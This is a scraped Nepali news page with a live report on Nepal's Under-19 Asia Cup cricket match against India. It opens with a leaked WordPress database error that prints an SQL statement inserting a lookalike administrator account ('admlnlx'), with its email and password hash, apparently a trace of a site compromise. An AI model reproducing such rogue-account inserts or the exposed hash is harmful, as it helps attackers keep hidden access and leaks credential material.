WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BqYoFzKGsv03P.fpejgcShEs4UyrLO0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 04:44:27', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस १–
श्रीलंकामा जारी १९ वर्षमुनीको एशिया कप क्रिकेटमा नेपालले दोस्रो खेलमा अहिले भारतसंग भिडिरहेको छ । टस जितेर नेपालले पहिलो व्याटिङ रोजेको छ । नेपालले ११ औं ओभरमा दुई विकेट गुमाएको छ । ओ
पनर सन्दिप सुनार ७ रन बनाउँदा राहुल चचरको बलमा एलबी डब्लुको सिकार बने । लगत्तै आएका अदिल खान खाता नै नखोली उनकै बलमा बोल्ड भए । यस्तै नेपालले १३ औं ओभरमा ओपनर अशिफ शेखलाई गुमाएको छ । उनी पनि राहुलकै बलमा १८ रन बनाएर क्याचआउट भए । १५ औं ओभरमा नेपालले अर्का व्याट्सम्यान भुवन सार्कीलाई गुमाएको छ । उनले पनि खाता खोल्न सकेनन् । नेपालले १५ ओभरको समाप्तीमा ४ विकेटको क्षतिमा ४२ रन बनाएर खेलिरहेको छ ।
प्रतियोगितामा नेपालले पहिलो खेलमा हिजो श्रीलंकासंग एक रनले पराजित भएको थियो ।